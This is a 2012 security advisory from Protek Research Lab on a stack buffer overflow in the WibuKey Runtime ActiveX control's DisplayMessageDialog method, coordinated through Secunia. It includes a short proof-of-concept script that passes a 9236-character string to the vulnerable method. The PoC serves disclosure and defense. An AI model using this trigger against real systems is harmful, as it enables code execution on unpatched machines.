PRL-2012-35

#####################################################################################

Application:   WibuKey Runtime for Windows ActiveX Control Buffer Overflow Vulnerability

Platforms:   Windows

Version:   The vulnerability is confirmed in version 6.00f Build 140. Other versions may also be affected.

Secunia: SA49987

{PRL}:   2012-35
Author:   Francis Provencher (Protek Research Lab’s)

Website:   http://www.protekresearchlab.com/

Twitter:   @ProtekResearch

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) The Code

#####################################################################################

===============
1) Introduction
===============

 

Our reliable WibuKey is still available for many interfaces and operating systems.
For your new projects however, we recommend our flexible CodeMeter® technology

with scalable security features ranging from software activation through to dongle solutions,

and including extensive licensing management functionalities.

 

http://www.wibu.com/en/wibukey/downloads/showDownloadNotice/softwareschutz-broschre-2009-de-121.html

 

#####################################################################################

============================
2) Report Timeline
============================

2012-07-19 – Vulnerability reported to Secunia
2012-12-26 – Coordinated public release of advisory

#####################################################################################

============================
3) Technical details
============================

The vulnerability is caused due to a boundary error within the WkWin32.dll module

when processing the “DisplayMessageDialog()” method. This can be exploited to

cause a stack-based buffer overflow via an overly long string passed as the parameter

to the method. Successful exploitation allows execution of arbitrary code..
#####################################################################################

===========
4) The Code
===========

 

<object classid=’clsid:00010000-0000-1011-8002-0000C06B5161′ id=’target’ />

targetFile = “C:\Program Files (x86)\WIBUKEY\Bin\Wibukey.dll”
prototype  = “Sub DisplayMessageDialog ( ByVal Message As String )”
memberName = “DisplayMessageDialog”
progid     = “WIBUKEYLib.Wibukey”
argCount   = 1

arg1=String(9236, “A”)

target.DisplayMessageDialog arg1

</script></job></package>

 

 

 

################################################################################